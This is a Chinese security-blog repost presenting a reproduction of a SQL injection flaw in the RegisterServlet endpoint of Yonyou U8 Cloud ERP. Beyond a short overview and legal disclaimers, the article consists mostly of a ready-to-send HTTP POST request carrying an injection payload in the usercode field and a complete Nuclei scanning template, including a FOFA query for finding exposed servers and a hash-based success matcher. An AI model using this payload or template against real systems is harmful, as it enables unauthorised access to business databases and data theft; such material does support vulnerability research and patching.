「漏洞复现」用友u8-cloud RegisterServlet SQL注入

admin
admin
admin
140350
文章
117
评论
2023年11月13日18:06:20评论68 views字数 1514阅读5分2秒阅读模式

免责声明


「漏洞复现」用友u8-cloud RegisterServlet SQL注入


此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

漏洞概述

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

        U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。然而,该平台中存在一个安全漏洞,涉及RegisterServlet接口对用户输入参数缺乏有效过滤,可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库,造成潜在的信息泄露风险。建议尽快修复漏洞,强化输入验证,提升系统安全性。

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

漏洞复现

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

POST /servlet/RegisterServlet HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36Connection: closeContent-Length: 85Accept: */*Accept-Language: enContent-Type: application/x-www-form-urlencodedX-Forwarded-For: 127.0.0.1Accept-Encoding: gzip
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


「漏洞复现」用友u8-cloud RegisterServlet SQL注入

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

NUCLEI POC

「漏洞复现」用友u8-cloud RegisterServlet SQL注入

id: yonyou-u8-cloud-RegisterServlet-sql
info:  name: 用友u8-cloud RegisterServlet SQL注入  author: rain  severity: high  description:    用友U8 cloud的RegisterServlet接口对用户传入的参数未进行有效的过滤,攻击者可利用该漏洞进行sql注入。  tags: [用友U8-Cloud, sql注入, 高危]  metadata:    fofa-query: app="用友-U8-Cloud"http:  - raw:      - |-        POST /servlet/RegisterServlet HTTP/1.1        Host: 192.168.86.128:8089        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36        Connection: close        Content-Length: 85        Accept: */*        Accept-Language: en        Content-Type: application/x-www-form-urlencoded        X-Forwarded-For: 127.0.0.1        Accept-Encoding: gzip
        usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--      
    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code==200 && contains(body_1, "e10adc3949ba59abbe56e057f20f883e")'

「漏洞复现」用友u8-cloud RegisterServlet SQL注入


「漏洞复现」用友u8-cloud RegisterServlet SQL注入

原文始发于微信公众号(知黑守白):「漏洞复现」用友u8-cloud RegisterServlet SQL注入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月13日18:06:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「漏洞复现」用友u8-cloud RegisterServlet SQL注入https://cn-sec.com/archives/2201749.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息